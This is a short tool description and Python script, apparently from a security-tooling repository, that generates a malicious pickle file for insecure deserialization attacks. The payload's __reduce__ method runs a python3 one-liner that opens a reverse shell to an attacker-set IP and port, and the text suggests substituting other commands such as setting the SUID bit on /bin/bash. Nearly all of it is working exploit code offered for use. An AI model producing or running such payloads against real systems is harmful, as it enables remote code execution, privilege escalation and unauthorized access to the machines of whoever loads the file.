Pickle Revshell Generator
Builds a reverse shell payload for pickle deserialization
Adjustable variables for situations requiring pickle payload.
cmdcan be replace with other desired commands (ex.chmod +s /bin/bash)
import os
import pickle
ATTACKER_IP = "127.0.0.1"
ATTACKER_PORT = 6969
FILEPATH = "./"
FILENAME = "revshell.pickle"
class ExploitPayload:
def __reduce__(self):
cmd = (
f"python3 -c 'import os,pty,socket; "
f"sock_obj=socket.socket(); "
f"sock_obj.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT})); "
f"[os.dup2(sock_obj.fileno(),fd_num) for fd_num in (0,1,2)]; "
f"pty.spawn(\"/bin/bash\")'"
)
return (os.system, (cmd,))
payload_path = os.path.join(FILEPATH, FILENAME)
with open(payload_path, "wb") as payload_file:
pickle.dump(ExploitPayload(), payload_file, protocol=pickle.HIGHEST_PROTOCOL)